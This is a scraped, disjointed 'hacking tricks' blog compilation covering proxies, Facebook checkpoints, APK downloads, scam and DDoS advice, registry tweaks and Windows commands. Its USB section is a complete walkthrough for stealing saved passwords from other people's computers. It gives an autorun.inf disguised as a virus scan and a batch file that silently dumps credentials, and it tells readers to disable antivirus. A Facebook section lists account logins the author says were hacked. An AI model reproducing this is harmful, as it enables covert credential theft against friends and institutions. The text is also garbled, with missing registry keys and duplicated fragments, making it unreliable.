Usually, people get apps for their android device by downloading them from Google Play Store . The downloader gets the app installed ...
Tricks for Hacking & Security
This Blog should contain an information to HACKING & SECURITY . The "ETHICAL HACKING" site should include a perfect information of your work, aims and Goals.
Today I Will Tell You Latest Youtube Hacking Tricks.....Please If You Like Our Tricks Then Like Our Facebook Page and share our tricks On Your Timeline This Is our Credit.....
First Step Open Youtube And Copy Video Url.. Like.... http://www.youtube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM
In your college or school they restrict to see some sites ? You can access without any restrictions using the proxy server.
What is Proxy?
Proxy server is some kind of a buffer between your computer and the
designated internet destination. When you use a proxy server , your
computer will send a request to the proxy server , then the proxy
server will send it to the destination (for example a website), the
destination will answer the request the proxy has sent and finally the
proxy will return the data to you computer.
Reasons for using proxy servers:
Proxy server is able to increase or decrease the speed of your
connection to the Internet depending on the location of the proxy
Proxy server ( but only anonymous) can hide your IP address (the
resource you visit will retrieve the IP of the proxy, and not your
Proxy servers can help in case some owner of an Internet resource
impose restrictions for users from certain countries ( for example
hulu.com is only reserved for those from United States, if you are not
from United States, you can’t watch videos on hulu.com)
How to Use:
open the proxy server site .
when you open the browser it will ask you to get the certificate.
so click "Get certificate "
and click "ok"
Now site will be opened
The website will ask you to enter the url of site.
enter url of site you want to visit .
Windows
stores most of the passwords which are used on a daily basis, including
instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger
etc. Along with these, Windows also stores passwords of Outlook Express,
SMTP, POP, FTP accounts and auto-complete passwords of many browsers
like IE and Firefox.
There
exists many tools for recovering these passswords from their stored
places. Using these tools and an USB pendrive you can create your own
rootkit to hack passwords from your friend’s/college Computer.
We need the following tools to create our rootkit. MessenPass: Recovers
the passwords of most popular Instant Messenger programs: MSN Messenger,
Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant
Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail
PassView: Recovers the passwords of the following email programs:
Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only),
Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts),
IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail
Free.
Mail PassView can also recover the passwords of Web-based email accounts
(HotMail, Yahoo!, Gmail), if you use the associated programs of these
accounts. IE Passview: IE PassView is a small utility that reveals the
passwords stored by Internet Explorer browser. It supports the new
Internet Explorer 7.0, as well as older versions of Internet explorer,
v4.0 – v6.0 Protected Storage PassView: Recovers all passwords stored
inside the Protected Storage, including the AutoComplete passwords of
Internet Explorer, passwords of Password-protected sites, MSN Explorer
Passwords, and more… PasswordFox: PasswordFox is a small password
recovery tool that allows you to view the user names and passwords
stored by Mozilla Firefox Web browser
By default, PasswordFox displays the passwords stored in your current
profile, but you can easily select to watch the passwords of any other
Firefox profile. For each password entry, the following information is
displayed: Record Index, Web Site, User Name, Password, User Name Field,
Password Field, and the Signons filename. Here is a step by step
procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the
executables(.exe files) into your USB Pendrive. ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun] open=launch.bat ACTION= Perform a Virus Scan save the Notepad
and rename it from New Text Document.txt to autorun.inf Now copy
theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it. start
mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start
iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start
passwordfox.exe /stext passwordfox.txt save the Notepad and rename it
from New Text Document.txt to launch.bat Copy the launch.bat
file also to your USB drive. Now your rootkit is ready and you are all
set to hack the passwords. You can use this pendrive on your friend’s PC
or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3.
Now all the password hacking tools will silently get executed in the
background (This process takes hardly a few seconds). The passwords get
stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer
How
To Sniff Passwords Using USB Drive,How To Sniff Passwords Using USB
Drive,HOW TO HACK PASSWORD USING USB DRIVE,Hack Passwords Using A Usb
Device,Hack Password Using Usb Flash Drive ,How To Hack Passwords Using
USB Drive,How To Hack Passwords Using A USB,How To Hack Saved Passwords
Using USB,How To Hack Passwords Through USB Drive,How To Make An
Auto-Hacking USB Drive,STEALLING PASSWORDS USING USB DRIVE.,Creating An
Auto Hack USB Drive Using Autorun And Batch Files,How To Hack Passwords
Using An USB Drive,How To Sniff Passwords Using USB Drive,Hack Passwords
Using USB Flash Drive,How To Hack Passwords Using Usb Drive
Softwares,Hack Passwords Using Pen Drive
How to Bypass Facebook Checkpoint Hack [Remove Security Questions]
How
to Hack Facebook Checkpoint and get rigid of Facebook
Security Questions. I got about 23 request on Topic "How to Break the
Facebook Security Questions for easy Facebook Browsing" so I created
this post. Friends I don't have any Facebook Account. To show this
checkpoint problem I need a Account. So I Hacked some Account.
Account from Iran
eMail Address: shadykiller@hotmail.com
Password: 123456
Account from India [This account was hacked a different advanced method so i have to change the orginal password]
eMail Address: cyber_ninja@gmail.com
Password: 5555555
What is Facebook Checkpoint ?
It is New Facebook Security System. which helps facebook users from
hackers [bull shit. I hacked that Account shadykiller@hotmail.com]
When the Facebook Checkpoint is shown ?
When
ever a Facebook user browsers Facebook from a different IP
address than he usually does the facebook checkpoint is shown. Even if
his web browser is changed facebook check point is shown I think this
is stupid. Limited number of users have a Static IP Address.
For what the Facebook Security Questions are Shown?
If you login in to your Facebook Account from different Browser
If you login in to your Facebook Account from different Location
If you login in to your Facebook Account from different Computer
If you are trying to login from multiple Account
What Type of Security Questions are shown ?
Upload Photo ID [your goverment ID card must be uploaded to access facebook]
Identify the People tagged you [5 Photos]
Identify Friends Photo [5 Photos]
login from recent logged computers [you can't login from this computer]
Use your Mobile Number
Answer your security questions
Much More
I am using the above the above given eMail Address and Password to Login
Removing Identify the People Tagged you Checkpoint [eMail: shadykiller@hotmail.com]
This
is shown because you logged in from different location or different
computer or even different browser. If you are tagged by other. there is
no option of other security questions
Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
After you Click Start you should complete five photo tags
After
you complete all this you can access your account. Most of them can't
remember 3 month ago tags. Do you see the above screenshot of tags. the
middle tagged photo. what is it. whos photo is that. who tagged it.
no one can identify photos like that
If your
Account is Blocked like this and can't access. you can login in from
your mobile version of facebook [m.facebook.com] in mobile version of
facebook you birth dath is the security question. I f you know this
login in to your account and access your photos and see who tagged you
and then try to login from web version of facebook and give answer to
your tags
To get
remove this tag security checkpoint. Please tell your friends to not to
tag you or change your settings for tag [You can only tag yourself in a
photo]
Removing Identify Photos of Friend Checkpoint [eMail: cyber_ninja@gmail.com]
This
is shown because you logged in from different location or different
computer or even different browser. If you are tagged by other. there is
option of other security questions
Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
If
you Make too many wrong answers this option will be removed and you
will have only two security questions. your Mobile number and Security
Questions. If you don't Have it or you have't added it. there is no
help for you you account is blocked. Below is a screenshot of too many
wrong answers
To
remove this type of security questions don't add friends or before
your account is blocked. try the above mentioned Mobile version trick
of facebook
Identify Photo ID Card [Anonymous]
Your are think why i named this facebook id as anonymous because it was a ladies profile. i can't expose her personal details. sorry.
This is shown because There are other Profiles with you Identity. Matching your profile. There is other option to recover
Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
If
you can't pass this. Try to login from the Facebook Mentioned
computer with the same browser. If you IP Address is change [not a
static IP] you can't login in. your account is blocked permanently
To
remove this type of security questions. try the above mentioned Mobile
version trick of facebook. you can unlock this only if you know your
date of birth. If you don't know this your account is blocked.
There
are so many fraudulent companies which are engaging peoples, those who
are willing to make money online. Offering them easy jobs like
Ad-posting, Form filling, Emails reading, Writing spam articles, Bogus
surveys, etc. Later ask people to register on their website by paying a
little registration fees (that little bucks make them rich). After all
paying nothing after the job has been done, by arguing work has not been
done in time or not properly.
Try
to get advice from family members, friends, co-workers before involving
in such an online jobs like "make money at home", "earn money without
leaving home" & many more like these eye catching phrases. People
often confused after visiting their stunning websites which includes Demo videos
how would you do it & earn a lot of money without leaving home. Do
some little research before applying and paying them on the search
engine by finding about scams. It will give you the best idea to pay or
not to pay.
Trying
to get rich online is not an easy task but need special attention and
focus. You need website to sell your products or services online. If you
have a website then you need to know how to attract the visitor to
raise traffic to your online business, website/store to get more sales.
Usually, people get apps for their android device by downloading them from Google Play Store. The downloader gets the app installed
for you, without bothering you with unnecessary details like the files
required for installation etc. But what if you don’t have access to
internet and you want an app installed on your phone? Surely you can’t do so without downloading
stuff required for the installation. The solution to this problem is
simple - just get the APK package of the desired app, and keep it
beforehand for later when you need.
APK stands for Android Package. It’s actually a package which contains all the files necessary for installation. In other words, it’s a ‘standalone’ installer for your app which doesn’t require internet connectivity. You can get APK package of an android application from Google Play Store
by simply adding an extension called ‘APK Downloader’ to your Google
browser. Here we have a step by step procedure which will tell you how to add APK Downloader to your Google Chrome and subsequently, use it for getting APK packages
Download the extension from the link provided above
Once downloaded, the extension is to be added to your Google Chrome Extensions. To do so, follow these steps.
Go to the ‘Tools’ menu of your Chrome and select ‘Extensions’.
Locate the file you just downloaded (with extension ‘.crx’)
Now drag the file to your Extensions page.
For confirmation look for a small Play Store icon on your address bar
To configure the APK Downloader extension for your android device
Select the ‘options’ button on the menu
Enter the Gmail ID (the one required for Play Store)
Enter your password and device ID of your android device
For those of you who don’t know where to get device ID of your android device
Dial “*#*#8255#*#*” from your android phone
If you are using an android tablet
Go to Google Play Store
Download ‘Device ID’
Device ID will get your device ID for you.
Getting APK of an app
is simple, just locate the app you want (on Play Store) and clicking on
the APK icon on your address bar will get you your precious APK for that
app. Another good thing about APK package is that it makes app sharing
simple, now you can share an app with your friends by simply
transferring the package to their device.
The APK and APK Downloader will make your life a lot easier if you face problems in installing your favorite apps due to connectivity issues or if you like to share your favorite apps with your friends.
Did you find this post useful? Did you have any problems? For any query, please ask in the comments section below.Let's enjoy... :)
Social networks are always great for communicative people; they make you
closer to your friends, relatives and hackers. Social networks are very
attractive for such kind of people. You can ask me: “Why do they need
that?” All they need is your account.
The fraud schemes may be different. But the main aim of them is money.
They can ask your relatives for help, especially when you’re far away.
Why shouldn’t they believe their own child, when he needs money?
Fraudsters do not disdain playing on the heartstrings. They can write
everything, that there’s an accident, you’re in a hospital, etc. So
today we’ll study to confront fraudsters and keep our nerves and money
safe.
Consequences
The most people don’t think about possible risks when creating their profile on social networks. The more personal and professional
information you give, the easier it is for fraudsters to rob you. Let
us discuss the easiest scheme. Some criminals are simply searching for
people living in the same city to plunder their houses. Why does it
happen? Different people are writing perfect information, like “We’re
going to visit California next
weekends. Hoping it’ll be great” Of course it will be great. For the
robber, because now he knows that the house will be empty during
weekends and it’s the perfect opportunity for him.
The second thing is the photos. When you’re downloading images and photos on social networks not only your friends like them. It’s also the perfect resource for burglars.
From home-made photos, they can receive information about your welfare
and house structure. When you have a dog, the robber will be prepared,
because everyone has photos with their home pets. That’s why we
earnestly advise you not to put in the Internet photos of your house,
and some things that can attract robbers, for instance your new car or a
brilliant ring.
Advice
The next our advice – create a complicated password. We’ve just discussed what fraudsters can do with the access to your account,
so try to protect yourself, your friends, and relatives as good as you
can. Don’t make a password consisting of just your birth date. Remember,
that it’s the first combination fraudsters try. Also, don’t put your
birth date as the answer to the test question if it’s mail. Check out
below article on password cracking.
Let us imagine that you have a complicated password, you don’t download the “rob-attractive” photos and one day you receive the link
from your friend where he asks you to vote for him. Stop now. This can
be a trap. If you’ll link, the fraudsters receive your personal data,
such as login and password. Such scheme is called “fishing”. So,
in this case, ask your friend something personal. The other variant is
just to make him a call and ask about this. If you’ll receive the answer
like “What are you talking about?” you should explain him that he was
hacked and offer to change the password. Check out below tutorial to
know about popular hacking method used to acquire sensitive information
about oneself.
Phones are really helpful things. Explain to your friends and relatives
that you can be hacked and if they receive messages with money requests,
they must call you at first and ask about that. Remember that your security is in your hands and be careful.
Distributed denial-of-service (DDoS) attacks are always in top headlines
worldwide, as they are plaguing websites in banks, and virtually of
almost every organization having a prominent online presence. The main
cause behind the proliferation of DDoS attacks is that there is a very low-cost that the attacker has to incur to put such attack in motion.
Fortunately, today various prevention methods have been developed to
tackle such attacks. Before delving further into understanding about the
ways to prevent DDoS attack, let’s first understand what exactly a DDoS attack is!
Understanding DDOS Attack
A DDoS (distributed denial-of-service) attack is an attempt made by
attackers to make computers’ resources inaccessible to its anticipated
user. In order to carry out a DDOS attack the attackers never uses their
own system; rather they create a network of zombie computers often called as a “Botnet” – that is a hive of computers, to incapacitate a website or a web server.
Let’s understand the basic idea! Now, the attacker notifies all the
computers present on the botnet to keep in touch with a particular site
or a web server, time and again. This increases traffic on the network
that causes in slowing down the speed of a site for the intended users.
Unfortunately, at times the traffic can be really high that could even
lead to shutting a site completely.
3 Basic Tips to Prevent a DDoS Attack
There are several ways to prevent the DDOS attack; however, here in this guest post I’ll be covering three basic tips that will help you to protect your website from the DDoS attack.
1.Buy More Bandwidth.
One of the easiest methods is to ensure that you have sufficient
bandwidth on your web. You’ll be able to tackle lots of low-scale DDOS attacks simply by buying more bandwidth so as to service the
requests. How does it help? Well, distributed denial of service is a
nothing more than a game of capacity. Let’s suppose you have 10,000
computer systems each distributing 1 Mbps directed towards your way.
This means you’re getting 10 GB of data that is hitting your web server every second. Now, that’s causes a lot of traffic!
So to avoid such issue, you need to apply the same rule intended for
normal redundancy. According to this technique, if you wish to have more
web servers just multiply around diverse datacenters and next make use
of load balancing. By spreading your traffic to various servers will
help you balance the load and will most likely create large space adequate to handle the incessant increase in traffic.
However, there’s a problem with this method that is buying more
bandwidth can be a costly affair. And as you’ll know that the current DDoS attacks are getting large, and can be a lot bigger exceeding your budget limit.
2.Opt for DDoS Mitigation Services.
A lot of network or Internet-service providers render DDoS mitigation capabilities. Look for an internet service provider
having the largest DDoS protection and mitigation network, automated
tools, and a pool of talented anti-DDoS technicians with the wherewithal
to take action in real-time as per the varying DDoS attack
characteristics. A viable alternative is to utilize a DDoS prevention
appliance, which is specifically intended to discover and prevent
distributed denial-of-service attacks.
3.Restricted Connectivity.
In case you have computer systems that are connected to the web
directly, a better idea is to properly install/configure your routers
and firewall so as to limit the connectivity. For an instance, while
receiving some data from a client machine you can only allow traffic to
pass from the machine only on a few chosen ports (like HTTP, POP, SMTP
etc.) via the firewall.
Wrapping Up!
Websites are largely getting attacked by hackers every second.
Denial-of-service attack is insanely getting huge and is creating a lot
of problems for business organizations having strong online vicinity. In
this guest post you’ll not only understand what a DDoS attack actually means, but will also come to know about a few type of methods to prevent DDoS attacks.
Aforementioned are three tips that I’ll recommend you to run through to
at least understand where to get started towards building a resilient
web network with chances of surviving a DDoS attack.
Every human discovery has pros and cons, so is the computer
which has pervaded all our lives. The modern humanity is increasingly
dependent on computer for various day-to-day activities. Computers do us
a whole lot of good things, but it is not without some pitfalls. With
the extensive use of internet for hundreds of our needs, computer opens a vicious cycle of hackers. Computer hacking is a term which refers to an individual’s illegal and unauthorized access to the data which are stored in a user’s system. This is done to disturb the confidentiality and security of the user’s computer.
The hackers focus on individuals’ computer system when they are online. As long as you are not connected to internet you are less prone to hacking. The access to internet has actually made computer hacking easy. You must protect your computer with strong antivirus and firewall programs to keep hackers away. Hackers are known for creating problems which are
difficult to solve. This gives a good business to computer
investigators and technicians. Hacking can be done in lots of ways. Few
of them are given below:
Worms: These are the programs which propagate through networks.
Trojans: These are hidden in websites, attached files and emails.
Viruses: These attach themselves to various kinds of files. They can damage certain functions of your computer.
Hackers also crash on wireless networks which do not have firewall
installed and enabled. They can also send email attachments with
malicious software which get embedded on the victim’s computer. Hackers
attack accounts which have weak passwords. All these are done to get access to
confidential and sensitive information of the users. Whatever is the
method of hacking, the effect is harmful for the user. Your system will
be flooded with viruses, malwares which steal your information. In order
to avoid hacking one has to make sure that the systems at home or
office have the latest anti-virus program and firewall installed and
enabled. These programs need to be regularly updated. Use the latest
browser and scan your computer on a regular basis.
New Age...
The New Age of internet has brought with it many risk factors along with
umpteen advantages. The New Age is the time where our personal lives
are no longer very personal, but people are able to access personal
information of internet users from various sources in the virtual world.
We need to be careful about usernames and passwords, else it will lead
to dangerous consequences. Universities, large companies and government
agencies are mostly targeted by hackers simply because of the bulk of
information they handle. The great newspapers like The Wall Street
Journal and The New York Times were also targeted by hackers.
Computer hackers are people who gain remote access to information stored in a system elsewhere. During the 1950s and 60s hackers were more drawn towards learning the operations of a computer rather than stealing confidential information of a remote user. Unlike the olden days, now computer hacking has become more sophisticated and organized. In the late 1990s hackers tried to get access to files in the network of Pentagon. Some more expert hackers gained access to
the patent files at the Indiana University School of Medicine in
February 2003. Many hackers were sentenced in the history since hacking
represents a potential national security threat.
Viruses
One major tool hackers use to steal information from computer systems is
the use of viruses. Over the years the number of viruses has increased
drastically. The virtual world now has above 100000 viruses and the
number grows virtually every day. Apart from the threat the computer hackers pose, they also can be beneficial in one way. They can bring to light the flaws in a computer
network. Hackers can help in redesigning the system and in making
information inaccessible to illegal users and to unauthorized access.
Getting Administrative Access
Getting a log in password is one of the predominant ways to get access to a computer which is by the side of the hacker. Getting remote access to a computer
is another way to hack a system. Managing to crack a Wi-Fi password is
the third method of sneaking into someone else’s system. Hacking if done
on a public or school computer will have serious consequences. The
hacker will be put behind the bars for illegally accessing the computer which does not belong to him or her.
Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the Windows Registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize Windows in your own way, here is a list of 8 interesting registry hacks that you need to try:
1. Disable USB Devices:
Disabling USB ports can be a smart idea to add security to the computer. This can be really handy if the computer is on a public place where the chances of virus and other malware infection is really high. You can easily disable access to USB ports with the following registry hack:
Open the Registry Editor (Start -> Run -> Type regedit and hit Enter)
In the “Value data” field enter 4 and click on “OK”.
Close the Registry Editor and reboot.
To enable USB devices, follow the same procedure as above except in the step-4 enter3 in the “Value data” field.
Works on Windows XP, Vista and 7.
2. Disable Notification Balloons in Windows 7 and Vista:
You can now disable the annoying notification balloons that keeps popping up frequently with warning messages and reminders. Here is a step-by-step procedure to do that:
Open the Registry Editor and navigate to the following key:
Right-click on the right-hand pane, and create a new “DWORD”.
Rename it to EnableBalloonTips, double-click on it and set the “Value data” to 0. Reboot the computer to see the changes in effect.
3. Add “Recycle Bin” to My Computer in Windows 7 and Vista:
Would you like to add the “Recycle Bin” icon to My Computer so that you need not go back to the desktop to access it when required? Well, here is how you can do that:
Open the Registry Editor and navigate to the following key:
Right-click on “Policies”, select New -> Key and name the key as System.
If you are on Windows XP, you need not create the new key “System” as it is already present in it. So, you can directly navigate to:HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System in the Step-1 itself.
Right-click on “System”, create a new “DWORD” and name it toDisableTaskMgr.
Double-click on the DWORD “DisableTaskMgr” and set the “Value data” to 1(0=Enable, 1=Disable).
To enable the Task Manager, Set the “Value data” back to 0.
Works on Windows XP, Vista and 7.
5. Change the Registered Owner and Organization Name:
Here is a simple hack to change the name of the Registered owner on your computer:
On the right-side pane, create a new “String Value” and rename it to the name of the program that you want to add (you can give any name, it doesn’t matter).
Double-click on the “String Value”, in the “Value data” field add the path of the executable program that has to execute at startup.
Reboot the computer to see the changes in effect.
Works on Windows XP, Vista and 7.
7. Add “Pin to Start Menu” Option for Folders in Windows 7 and Vista:
Ever wanted to pin a folder to the start menu to gain faster access to it? Well, it is possible to add the “Pin to Start Menu” option so that you can plug your favorite folders to Start Menu. Here is a step-by-step procedure:
Right-click on “ContextMenuHandlers” and select New -> Key. Name the key as follows:
{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
Now, whenever you want to add a folder to Start Menu, hold down the Shiftkey and right-click on the folder. You should see the “Pin to Start Menu” option in the context menu”.
8. Disable “Aero Shake” in Windows 7:
One of the new additions to Windows 7 is the “Aero Shake” feature using which it is possible to grab a window using it’s title bar and shake it. This will minimize all the other open windows if any. It is really a handy feature! However, if you ever wanted to disable this feature, here is a solution:
Open the Registry Editor and navigate to the following key:
The Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such asCommand prompt (cmd), Calculator (calc) etc.
So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.
Creating the Customized Run Command:
Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing ie in the Run dialog box. Here is how you can do that.
Right-click on your Desktop and select New -> Shortcut.
You will see a “Create Shortcut” Dialog box as shown below
Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.
Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie“. Click on “Finish”.
You will see a shortcut named ie on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.
That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized Run commands for any program of your choice. Say ff for Firefox, ym for Yahoo messenger, wmp for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.
1: System File Checker Malicious software will often attempt to replace core system files with modified versions in an effort to take control of the system. The System File Checker can be used to verify the integrity of the Windows system files. If any of the files are found to be missing or corrupt, they will be replaced. You can run the System File Checker by using this command:
sfc /scannow
2: File Signature Verification One way to verify the integrity of a system is to make sure that all the system files are digitally signed. You can accomplish this with the File Signature Verification tool. This tool is launched from the command line but uses a GUI interface. It will tell you which system files are signed and which aren’t. As a rule, all the system files should be digitally signed, although some hardware vendors don’t sign driver files. The command used to launch the File Signature Verification tool is:
sigverif 3: Driverquery
Incorrect device drivers can lead to any number of system problems. If you want to see which drivers are installed on a Windows 7 system, you can do so by running the driverquery tool. This simple command-line tool provides information about each driver that is being used. The command is:
driverquery
If you need a bit more information, you can append the -v switch. Another option is to append the -si switch, which causes the tool to display signature information for the drivers. Here’s how they look:
driverquery -v
driverquery -si
4: Nslookup
The nslookup tool can help you to verify that DNS name resolution is working correctly. When you run nslookup against a host name, the tool will show you how the name was resolved, as well as which DNS server was used during the lookup. This tool can be extremely helpful when troubleshooting problems related to legacy DNS records that still exist but that are no longer correct.
To use this tool, just enter the nslookup command, followed by the name of the host you want to resolve. For example:
nslookup dc1.contoso.com 5: Ping
Ping is probably the simplest of all diagnostic commands. It’s used to verify basic TCP/IP connectivity to a network host. To use it, simply enter the command, followed by the name or IP address of the host you want to test. For example:
ping 192.168.1.1
Keep in mind that this command will work only if Internet Control Message Protocol (ICMP) traffic is allowed to pass between the two machines. If at any point a firewall is blocking ICMP traffic, the ping will fail.
6: Pathping
Ping does a good job of telling you whether two machines can communicate with one another over TCP/IP, but if a ping does fail, you won’t receive any information regarding the nature of the failure. This is where the pathping utility comes in.
Pathping is designed for environments in which one or more routers exist between hosts. It sends a series of packets to each router that’s in the path to the destination host in an effort to determine whether the router is performing slowly or dropping packets. At its simplest, the syntax for pathping is identical to that of the ping command (although there are some optional switches you can use). The command looks like this:
pathping 192.168.1.1
7: Ipconfig
The ipconfig command is used to view or modify a computer’s IP addresses. For example, if you wanted to view a Windows 7 system’s full IP configuration, you could use the following command:
ipconfig /all
Assuming that the system has acquired its IP address from a DHCP server, you can use the ipconfig command to release and then renew the IP address. Doing so involves using the following commands:
ipconfig /release
ipconfig /renew Another handy thing you can do with ipconfig is flush the DNS resolver cache. This can be helpful when a system is resolving DNS addresses incorrectly. You can flush the DNS cache by using this command:
ipconfig /flushdns
8: Repair-bde
If a drive that is encrypted with BitLocker has problems, you can sometimes recover the data using a utility called repair-bde. To use this command, you will need a destination drive to which the recovered data can be written, as well as your BitLocker recovery key or recovery password. The basic syntax for this command is:
repair-bde -rk | rp You must specify the source drive, the destination drive, and either the rk (recovery key) or the rp (recovery password) switch, along with the path to the recovery key or the recovery password. Here are two examples of how to use this utility:
The tasklist command is designed to provide information about the tasks that are running on aWindows 7 system. At its most basic, you can enter the following command:
tasklist The tasklist command has numerous optional switches, but there are a couple I want to mention. One is the -m switch, which causes tasklist to display all the DLL modules associated with a task. The other is the -svc switch, which lists the services that support each task. Here’s how they look: tasklist -m
tasklist -svc 10: Taskkill
The taskkill command terminates a task, either by name (which is referred to as the image name) or by process ID. The syntax for this command is simple. You must follow the taskkill command with -pid (process ID) or -im (image name) and the name or process ID of the task that you want to terminate. Here are two examples of how this command works: